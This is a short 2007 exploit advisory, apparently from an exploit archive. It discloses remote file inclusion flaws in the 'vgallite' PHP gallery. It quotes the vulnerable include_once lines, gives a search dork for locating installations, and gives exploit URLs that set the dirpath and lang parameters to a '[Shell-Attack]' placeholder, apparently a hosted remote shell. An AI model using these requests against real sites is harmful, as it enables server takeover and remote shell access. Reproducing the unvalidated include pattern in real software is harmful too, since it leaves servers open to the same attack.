Home / os / solaris

vgallite-rfi.txt

Posted on 08 August 2007

Discovred By : Hasadya Raed ---------------------------- Contact : RaeD@BsdMail.Com , Hacker_Web@W.Cn , Gunman_Pump@Hotmail.Com ---------------------------- Greetz : Jonathan , Muts ---------------------------- Script: ALL vgallite ---------------------------- Dork: "vgallite" ---------------------------- B.File: _functions.php index.php ---------------------------- Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename"); Vuln code: include_once("lang/".((isset($language))?$language:"english").".php"); ---------------------------- Exploit: Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack] Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack] ---------------------------- <----!Team Hackers Israel----!>

 

TOP